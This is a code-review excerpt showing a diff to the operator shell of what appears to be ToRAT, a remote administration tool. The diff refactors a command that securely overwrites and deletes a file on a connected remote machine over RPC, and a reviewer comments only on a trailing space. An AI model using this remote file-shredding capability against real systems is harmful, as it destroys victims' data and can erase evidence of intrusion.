torat_server/client_ishell.go

```diff
@@ -236,21 +241,21 @@ func (client *activeClient) Reconnect(c *ishell.Context) {
 	c.Stop()
 }
 
-// Remove remote file
-// TODO: Is this used? Where?
+// Shred a remote file
 func (client *activeClient) Shred(c *ishell.Context) {
-	args := shared.Shred{
-		Conf: shred.Conf{
-			Times:  3,
-			Zeros:  true,
-			Remove: true,
-		},
-		Path: strings.Join(c.Args, " "),
+	s := shared.Shred{
+		Path:   strings.Join(c.Args, " "),
+		Times:  3,
+		Zeros:  true,
+		Remove: true,
 	}
-	var r error
-	if err := client.RPC.Call("API.Shred", &args, &r); err != nil {
-		c.Println(red("[!] Could not shred path:", args.Path, err, r))
+
+	if err := client.RPC.Call("API.Shred", &s, &void); err != nil {
+		c.Println(red("[!] Could not shred path: ", s.Path))
```

Comment:
Trailing Space

Reply:
I'm gonna leave this then patch everything at once with sed